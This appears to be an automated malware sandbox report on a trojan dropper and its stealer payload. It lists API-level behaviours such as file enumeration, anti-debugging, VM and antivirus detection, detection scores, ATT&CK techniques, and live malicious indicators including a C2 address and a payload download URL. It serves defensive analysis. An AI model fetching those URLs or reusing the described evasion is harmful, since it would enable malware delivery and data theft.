                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F0E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F147D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F0EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F14B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F13B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F0F8F1 FindFirstFileA
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F0DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F0C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F0E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F01937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F0F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F14107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_00401160 GetSystemInfo,ExitProcess
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware
                  Source: 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D43000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwareF
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.6.dr | Binary or memory string: vmci.syshbin
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware, Inc.
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.6.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.6.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D66000.00000004.00000020.00020000.00000000.sdmp, mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: Amcache.hve.6.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.6.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.6.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.dr | Binary or memory string: vmci.sys
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.6.dr | Binary or memory string: vmci.syshbin`
                  Source: Amcache.hve.6.dr | Binary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.6.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware20,1
                  Source: Amcache.hve.6.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.6.dr | Binary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D43000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                  Source: Amcache.hve.6.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.6.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D68000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH
                  Source: Amcache.hve.6.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.6.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.6.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | API call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | API call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | API call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | API call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | API call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | API call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | API call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | API call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_004045C0 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0042A3F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_004045C0 VirtualProtect ?,00000004,00000100,00000000
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0041EC7E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0042FE7F mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_02D29B4B push dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_030400E6 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0301092B mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_03010D90 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_00419750 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02D19653 push dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F199B7 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F00D90 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F0092B mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0043BBE1 GetProcessHeap
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0042A3F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_004104F3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_00410686 SetUnhandledExceptionFilter
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0040F936 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0302075A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0303A65A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0301FB9D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_030208ED SetUnhandledExceptionFilter
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_0041CEEA SetUnhandledExceptionFilter
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F1AFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F1B5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F1D151 SetUnhandledExceptionFilter
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Memory protected: page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match | File source: Process Memory Space: 64A.tmp.exe PID: 5576, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F19867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Process created: C:\Users\user\AppData\Local\Temp\64A.tmp.exe "C:\Users\user\AppData\Local\Temp\64A.tmp.exe"
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0041079B cpuid
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0043B02A IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_004351E0 GetLocaleInfoW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0043B2ED EnumSystemLocalesW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0043B2A2 EnumSystemLocalesW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0043B388 EnumSystemLocalesW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0043B415 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0043B665 GetLocaleInfoW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0043B78E GetLocaleInfoW,GetLocaleInfoW,GetACP
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0043B895 GetLocaleInfoW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0043B962 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_00434DED EnumSystemLocalesW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0304B291 IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_03045054 EnumSystemLocalesW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0304B509 EnumSystemLocalesW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0304B554 EnumSystemLocalesW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0304B5EF EnumSystemLocalesW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_03045447 GetLocaleInfoW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0304BBC9 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0304BAFC GetLocaleInfoW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0304B9F5 GetLocaleInfoW,GetLocaleInfoW,GetACP
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0304B8C2 GetLocaleInfoW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0304B8CC GetLocaleInfoW
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_00417B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F17DF7 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_004103ED GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0041640A GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8
                  Source: Amcache.hve.6.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.6.dr | Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.6.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.6.dr | Binary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 2.2.64A.tmp.exe.2f00e67.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.64A.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.64A.tmp.exe.2f00e67.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.64A.tmp.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.3.64A.tmp.exe.4820000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.3.64A.tmp.exe.4820000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000002.00000003.2179254036.0000000004820000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.2422589956.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: 64A.tmp.exe PID: 5576, type: MEMORYSTR
                  Source: Yara match | File source: dump.pcap, type: PCAP

                  Remote Access Functionality

                  Source: Yara match | File source: 2.2.64A.tmp.exe.2f00e67.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.64A.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.64A.tmp.exe.2f00e67.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.64A.tmp.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.3.64A.tmp.exe.4820000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.3.64A.tmp.exe.4820000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000002.00000003.2179254036.0000000004820000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.2422589956.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: 64A.tmp.exe PID: 5576, type: MEMORYSTR
                  Source: Yara match | File source: dump.pcap, type: PCAP
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_004218EC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_00420C16 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_03031B53 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_03030E7D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext
MITRE ATT&CK Matrix (techniques listed per tactic column; a number in parentheses is the figure displayed beside that technique in the original matrix)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
Execution: Native API (13), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Privilege Escalation: Process Injection (111), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (11), Disable or Modify Tools (11), Process Injection (111), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (22), DLL Side-Loading (1), HTML Smuggling, Dynamic API Resolution
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
Discovery: System Time Discovery (2), Query Registry (1), Security Software Discovery (131), Virtualization/Sandbox Evasion (11), Process Discovery (11), Application Window Discovery (1), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (2), System Information Discovery (134)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot
Collection: Archive Collected Data (1), Clipboard Data (3), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
Command and Control: Encrypted Channel (21), Ingress Tool Transfer (12), Non-Application Layer Protocol (3), Application Layer Protocol (114), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement
Source | Detection | Scanner | Label
mCe4hBfqCT.exe | 39% | ReversingLabs | Win32.Trojan.CrypterX
mCe4hBfqCT.exe | 42% | Virustotal
mCe4hBfqCT.exe | 100% | Avira | HEUR/AGEN.1312567
mCe4hBfqCT.exe | 100% | Joe Sandbox ML

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\64A.tmp.exe | 100% | Avira | HEUR/AGEN.1312567
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe | 100% | Avira | HEUR/AGEN.1312567
C:\Users\user\AppData\Local\Temp\64A.tmp.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe | 45% | ReversingLabs | Win32.Trojan.CrypterX
C:\Users\user\AppData\Local\Temp\64A.tmp.exe | 45% | ReversingLabs | Win32.Trojan.CrypterX

No Antivirus matches

Source | Detection | Scanner | Label
post-to-me.com | 0% | Virustotal

Source | Detection | Scanner | Label
http://upx.sf.net | 0% | URL Reputation | safe
http://62.204.41.177/edd20096ecef326d.php | 18% | Virustotal
https://post-to-me.com/track_prt.php?sub=&cc=DE | 3% | Virustotal
Name | IP | Active | Malicious | Antivirus Detection | Reputation
post-to-me.com | 104.21.56.70 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://62.204.41.177/edd20096ecef326d.php | true | | unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DE | false | | unknown
http://62.204.41.177/ | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://post-to-me.com/track_prt.php?sub=&cc=DE | mCe4hBfqCT.exe, 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp | false | | unknown
http://62.204.41.177sLA | 64A.tmp.exe, 00000002.00000002.2422523199.0000000002D0E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://post-to-me.com/track_prt.php?sub= | mCe4hBfqCT.exe | false | | unknown
http://62.204.41.177/edd20096ecef326d.phpunf | 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://176.113.115.37/ScreenUpdateSync.exeY | mCe4hBfqCT.exe, 00000000.00000003.4371587584.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, mCe4hBfqCT.exe, 00000000.00000002.4504361306.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWARE | mCe4hBfqCT.exe, 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp | false | | unknown
https://post-to-me.com/ | mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
